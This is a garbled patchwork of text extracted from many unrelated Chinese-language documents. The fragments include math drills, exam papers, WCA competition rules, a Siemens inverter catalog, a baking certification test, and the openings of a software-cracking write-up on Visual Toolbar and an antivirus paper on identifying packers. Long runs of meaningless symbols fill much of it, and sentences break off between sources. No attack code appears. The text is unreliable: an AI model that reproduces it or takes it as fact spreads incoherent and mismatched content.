!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
a( a 0) a a( a 0) a = a ( a) = a a( a 0 ) a = a( a ) 0 a = a 4 f x 1 = x a ai a R sinx + a b ab sin x sinx = sinx sin x = 4 y = sinx + sinx - ysinx 4 = 0 sinx sinx x - 3 3= x x- 3 - x- 3 = 0
!"#$%"#$!& () #*("+$,# -+(&. )!""#!!!!!!!!! !!!"#$%#$&!"#$% #" %#&# %# (%!) (&#"*%!!!!!!!!!!!!!!!!!!!!!!! " "# (&$")(!*+,*)-%$ ".%).(%/!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ (&$")(!*+ &$*$(&$(!*+,*)-%$ )%!")0&
Microsoft Word - “调戏”反遭“反调戏”—记Visual Toolbar 的破解过程.doc
调戏 反遭 反调戏 记 Visual Toolbar 的破解过程 cntrump 由于要做工具栏, 在网上找到了 Visual Toolbar 这个工具, 看了介绍挺不错的, 下载回 来之后发现软件要注册, 但是这是个 04 年的软件, 已经没法向作者购买了, 更重要的原因 是俺还在失业中, 吃饭都成问题了, 哪里还有钱注册呀 ~~ 用 PEID 检测是 UPX 的老壳, 直接手脱, 过程不是重点反正能脱壳就行了
2 2 12 12 4 81 = 108 3 2 108 = 72 3 4 72 = 96 3 2 96 = 64 3 12 t = 2 1 2 11 12 12 12 2 l 2 l 2 l 2 12 ò ED = CB DA BA DE
Ps22Pdf
) ,,, :,,,,,,, ( CIP) /. :, 2001. 9 ISBN 7-5624-2368-7.......... TU311 CIP ( 2001) 061075 ( ) : : : : * : : 174 ( A ) : 400030 : ( 023) 65102378 65105781 : ( 023) 65103686 65105565 : http: / / www. cqup.
!"!""# $ $"% $! # & % ( ) $!
!" # $!%%& &"() *+%%&,%! %%!"!!! + & ( !"!""# $ $"% $! # & % ( ) $! . ")*(")*+ +/ ". ")*(!((" ")**"))!,/ -. "))."))1!/,. 23345 6 6 777/ 8798/ 9: 6 ; ?@A: B:?C:43@DE FE9@CG3D? $DE3?DH
WCA Regulations and Guidelines
WCA Regulations and Guidelines WCA Regulations Committee WCA 競 賽 規 則 2015 版 本 :2015 年 7 月 1 日 [wca-regulations-translations:c77f738] 註 釋 繁 體 中 文 翻 譯 本 翻 譯 版 本 完 全 依 照 官 方 版 本 翻 譯, 但 難 免 有 不 精 確 的 地 方,
<4D F736F F D20CEC4BCFEBCB6B6F1D2E2B4FAC2EBC9A8C3E8D2FDC7E6D6D0B5C4BCD3BFC7CAB6B1F0BCBCCAF52E646F6378>
文件级恶意代码扫描引擎中的加壳识别技术 安天实验室 Swordlea 2003 年 12 月 25 日 在文件级恶意代码扫描引擎的设计与实现过程中, 加壳后样本的特征选取和识别是较为棘手的问题 恶意代码的制作者为了使其作品传播更广, 往往使用软件加壳的方式 样本被加壳以后, 其原有特征码被变形或彻底隐藏, 在一定程度中增加了样本分析与识别的难度 目前反病毒公司在对加壳后样本的处理上一般采用以下几种方式
# #$$%& ()*+, -$. #-# / & 0 & 0 #& $& 1 #.& /# 2(3 #$$# $..-$ #$ 0 0 $$$$4 0 0 %# 0-5$ 6 /-0 /0 #$ 0 5$$$ #$$% 0 0 #$$% ()*+, -$. #-# / 7, $8 $$
# #$$%& ()*+, -$. #-# / & 0 & 0 #& $& 1 #.& /# 2(3 #$$# $..-$ #$ 0 0 $$$$4 0 0 %# 0-5$ 6 /-0 /0 #$ 0 5$$$ #$$% 0 0 #$$% ()*+, -$. #-# / 7,50 0 0 $8 $$ # # $ $ % % & & ( ( ) ) ## * #* + #+, & - &&. &$ /
!"!"# # $!""%& ()*+, - ". - "/!%,0 -.! $ " $ # $ $ $ 1 %%&0/! 2(3!""% "/%,.4 "/" -." "" - 5/" - "045 /"""" # # 999$ 6:8$ :;<$ =>
!"!"# # $!""%& ()*+, - ". - "/!%,0 -.! $ " $ # $ - - - $ $ 1 %%&0/! 2(3!""% "/%,.4 "/" -."0.055 00 5"" - 5/" - "045 /""""4 6778 # # 999$ 6:8$ :; "/" -."/.".5 6778 # # 999$ 6:8$ =?@$ =>,5, A 4 " /
!! "#$%&#%$ ((%)) *++*
! !! "#$%&#%$ ((%)) *++* !! "#$%&#%$ "#$%&#%$ ())%** +,,+! +,,-. !!!!!!!!!!! "# "!!!!!!!!!!!!! "# "# "!!!!!!!!!!!!! "# "# $!!!!!!!!!!! "# "# %!!!!!!!!!!!!! "# $!!!!!!!!!!! "# $# "!!!!!!!!!!!! "# $# $!!!!!!!!!!!!!
! "# $! ""# %& %! ($)& ($*$ + "# &*, ""# & &! ) *! $ "#! (- ((! %-,- %- $- %
!""# $$!% & ()*+,-. )/ (0-,12* 3,2404*45 )/ 67*8-40), 9)80-. 9805,85 :); & & & & & & & &?" & @ & $ A$ B $ #!""# " B """$ B "C & & $ #" $#%! $ " E F+-84085!!""# B "# B!$ $# C
校园之星
I V X V L C D M n n n X X X M M VI X X DC IV IX XL C D X V I I X V D CLXV I V X XCIX C X IC C I X X quatre vingt quatre vingt dix thousand million billion p M sinl sinl e x ii xii a ba bi MI sinl
! "# $ %& ( "# $ %& ) * $ %& + $ %& * $ %& -,)
"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
《爱迪生传》
!"#$%&" (") *+,-./.01. 234/,5 !! " # # # # " # # $ " $ %& ( ) %% $ " " $ ( " " $ " " " $ & " " * + $ " * +$ " $* " " +$ & " 0)0! " # " " $ %& ( & " & " & ) " " & "! " & " ** $ %" & & " & " " & & +,) +
,,,, :,,,,, ( ), ( ), ( ), ( ),,, ( CIP ) /. :, 2005. 8 ( 21 ) ISBN 7-5623-2268-6... - - -. F591. 99 CIP ( 2005 ) 090035 : ( 17, 510640) : 020-8711348
1 ,,,, :,,,,, ( ), ( ), ( ), ( ),,, ( CIP ) /. :, 2005. 8 ( 21 ) ISBN 7-5623-2268-6... - - -. F591. 99 CIP ( 2005 ) 090035 : ( 17, 510640) : 020-87113487 87111048 ( ) E-mail: scut202@ scut. edu. cn http:
MICROMASTER 410/420/430/440 DA kW 250kW MICROMASTER Eco & MIDIMASTER Eco MICROMASTER, MICROMASTER Vector DA64 MIDIMASTER Vector 90kW (Low
DA51.2 2002 micromaster MICROMASTER 410/420/430/440 0.12kW 250kW s MICROMASTER 410/420/430/440 DA51.2 2002 0.12kW 250kW MICROMASTER Eco & MIDIMASTER Eco MICROMASTER, MICROMASTER Vector DA64 MIDIMASTER
zt
" # $ % & ( ) " * " ) " % & + ( &, -. % & ( & # $ ( + - " " #$ %%&&& " ()( * %&+# %, %- % #&&# + % #&&# + %./01 ( 2 )&--+ 2 ) 2 -, 3#$4 "#$%& (#)"* # +,-- (#&. / " "#$%& (#)"* # 01&+%$"&2 (#&. / 33 33
#$%&% () % ()*% +,-. /01 % + (/) " " " 2- %** -340 $%&% 5!$%&% () % ()*% +,-. /01 % + (/) " " " 2- %** -340 /64 7%,(8(, *--9( ()6 /-,%/,65 :$%&
! " "!! " "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! " #$$% & ()*+,-.(*/!0%1 23)4-(4 5).67*(*8. #$$%!9 #$$% #!$1#$!1 #9 19 :9 %; :< #$$% = 0!$ ; = : : : = 1 % #!9 #$%&% () % ()*% +,-. /01 % + (/) " " " 2- %**
( )1
( )1. 如 圖 為 某 生 物 細 胞 行 減 數 分 裂 過 程 之 一, 正 常 情 況 下, 分 裂 完 成 後 子 細 胞 染 色 體 為 下 列 何 者? ( )2. 在 細 胞 的 分 裂 過 程 中,50 個 精 母 細 胞 與 50 個 卵 母 細 胞, 經 減 數 分 裂 後, 分 別 產 生 M 個 成 熟 的 精 配 子 細 胞 和 N 個 成 熟 的 卵 配 子 細 胞
Microsoft Word - ZLI14A0-105
105 年 指 考 趨 勢 預 測 歷 史 考 歷 科 史 科 文 / 朱 詩 堯 老 文 師 / 朱 詩 堯 老 師 1 前 言 大 考 中 心 根 據 101 課 綱, 將 指 考 歷 史 科 測 驗 分 為 四 項 可 相 互 依 存 的 指 標 : 基 礎 知 識 文 本 閱 讀 歷 史 解 釋 資 料 證 據, 每 項 指 標 又 將 記 憶 閱 讀 分 析 推 證 等 能 力 納 入 一
Ps22Pdf
f e L/ b I I P AD c b b P 131 132 133 b 134 W b b W 135 e d b AB b F F f f E E E E E G G G G G G E G E A B C D ABCD A B A B C D AB AB ABC D A BD C A B C D D D D E E E D b ED ED b ED b G E b b b b b
"
" #$ "#$$% " #$%&' $()' # # #*+, *+-./ #0"$1&&2$($$ 3 $(4% # 5 # 6 *+ # # - 7 8.9 3 7 #9 $('( $(): #$(4' ;$(4'$()' 3." # # # ; =" " "" ; =?,< >? @ 8.# 7 -,
zt
!"#! "#$%#& () *#+$%,-&(.//0 123" 4560785.9645/!: : : : ; ": # : : : $ : : : % : : : ; &: ; : *71?.//7 /.969= ; ; ; ; ; ; ; ; ; ; 44.88/4< ; %$$@!! +++: AB@CD: E,F ; /67. 69
!"# $ %&&% ( ")*+(,-&%.,/01%,&!$ "$ #$ $$23/!"# %&&% &14145.&&&..! (0(6.&4%.5./ %- /%&..&&& %&&% (. %&&% (. ")*+(,-&%.,/01%,& 23 %(4. %%$&&
!"# $ %&&% ( ")*+(,-&%.,/01%,&!$ "$ #$ $$23/!"# %&&% &14145.&&&..! (0(6.&4%.5./ %- /%&..&&& %&&% (. %&&% (. ")*+(,-&%.,/01%,& 23 %(4. %%$&& !" #$%& " ! " " # $ %!"!"#!&!!( ") "! "! "& "* "% &) &! &! &!
2015年北京市怀柔区中考数学一模试卷
2015 年 北 京 市 怀 柔 区 中 考 数 学 一 模 试 卷 参 考 答 案 与 试 题 解 析 一 选 择 题 ( 本 题 共 30 分, 每 小 题 3 分 ) 下 列 各 题 均 有 四 个 选 项, 其 中 只 有 一 个 是 符 合 题 意 的. 1.( 3 分 )(2015 怀 柔 区 一 模 ) 把 8000 用 科 学 记 数 法 表 示 是 ( ) A.80 10 2 B.8
Microsoft Word - 烘焙食品乙級第二部份 doc
烘 焙 食 品 乙 級 技 術 士 技 能 檢 定 術 科 參 考 資 料 試 題 編 號 :077-900201-3 審 定 日 期 : 年 月 日 修 訂 日 期 :96 年 7 月 1 日 97 年 1 月 30 日 97 年 10 月 27 日 98 年 6 月 20 日 98 年 12 月 17 日 99 年 08 月 20 日 烘 焙 食 品 乙 級 技 術 士 技 能 檢 定 術 科
<4D F736F F D F F315FAAFEA5F333AAF9B645C2E5C0F8AA41B0C8C249BCC6B24DB3E6B443C5E9A5D3B3F8AEE6A6A12E646F63>
門 診 醫 療 服 務 點 數 清 單 媒 體 申 報 格 式 及 填 表 說 明 97.5.1 更 新 版 ( 檔 案 名 稱 : DTLFA, 每 筆 長 度 246 BYTES) 項 次 資 料 名 稱 格 式 中 文 名 稱 / 資 料 說 明 ==== ======================== ==== ================================== *01
= 3 + 1 7 = 22 7 3.14 = 3 + 1 7 + 1 15 +1 = 355 3.1415929 113 221221221221 136136136136 221000000000 221000000 221000 221 = 136000000000 136000000 136000 221 1000000000 1000000 1000 1 = 136 1000000000
# " $ % $ # ( $ $ %% * $ %+ $, -., / ", 0, %, %%%%, " % 2 %% #. $ 3 *3 %45 6" %% 9: :" : "
#$$% #$$% #$$ #$$% #$$% #$$ #$$ # $ " #($ # $ #$ #($ *$ #$ $+ %$ #* # *, #+ *, -#+ -, #%+, " " #$$% + #+ -+ #$$( +." HI # 6 J : HI - 6 J #. KL38 ( /0. KL # 6 38 # ( : 4 G7 < $ 7 6 : 6 58 758 % 7 6 < =
05. = 8 0. = 5 05. = = 0.4 = 0. = 0.75 6. 5 = 6 5 0 4 4-6 4 8. 4 5 5 + 0.9 4 = 84 5 9-6 + 0 0 4 5 4 0 = 0-5 + = + 0-4 0 = 0-4 0 = 7 0.5 [ 9 6 0.7-0.66 ] 4.9 = 9 9 7 49 [ ] 0 50 0 9 49 = [ ] 9 5 0 = 49
+ 9 9 7 ABCD EFG A B C D E F G 9 ABCD + EFG = 99 ABCDEFG A B C D + E F G 9 9 BCDEFG D = 4 ABCD EFG C = 4 ABCD EFG A B B A 4 0 4 4 = = = 4 4 6 6 H E H E ( ) H E + H E A H ( ) A B C D + D C B A A B C D
!! "!!"#! # $ %&& ( "! )*+, " - &. - &/%%&& - 0!!$! "$! #$ - -! $$ 12.3! 4)5 %&& &.3 "3!!!!!!!!!!!! &/& - 0.&3.322!!!.! 2&& - 2/& - &362! /&&&//!!! 78
! !! "!!"#! # $ %&& ( "! )*+, " - &. - &/%%&& - 0!!$! "$! #$ - -! $$ 12.3! 4)5 %&& &.3 "3!!!!!!!!!!!! &/& - 0.&3.322!!!.! 2&& - 2/& - &362! /&&&//!!! 7889 # # :::( 7;9( ;?!!! &/& - 2%&%2266!!!!! 7889
!"#$!"%&!"$!""( )( )( #( "#*!&#) %&*!(+,- %.!/( )( #( ,-2 89 /
"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
! "! #!$$%!$$% &!!$$( # ) (
! " "!! " "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! " #$$% #$$%!!% % & %!$ ( # ) #$$% *!!% ! "! #!$$%!$$% &!!$$( # ) ( " #$ %&!#& ( )*+,* -) " " "./012 )*+ 302 4056 7+1.6 0 3*8(*/.0-96 :*+/26) -+. 80;6
zt
#! " #$$%& ()*+, - $% - $./001-2!& & & & "& & & & #& - - $& 3,.0& $ 4(5 #$$%$/1 #$ $.$ - 1%$/%/ % $$ -.$ - $/6.$$$. 7889!! :::& 7;9& ;? $.$ - #$# 66 7889!! :::& 7;9& >@A& >?,, B.$6#.!.1 #$$%.. #$$%.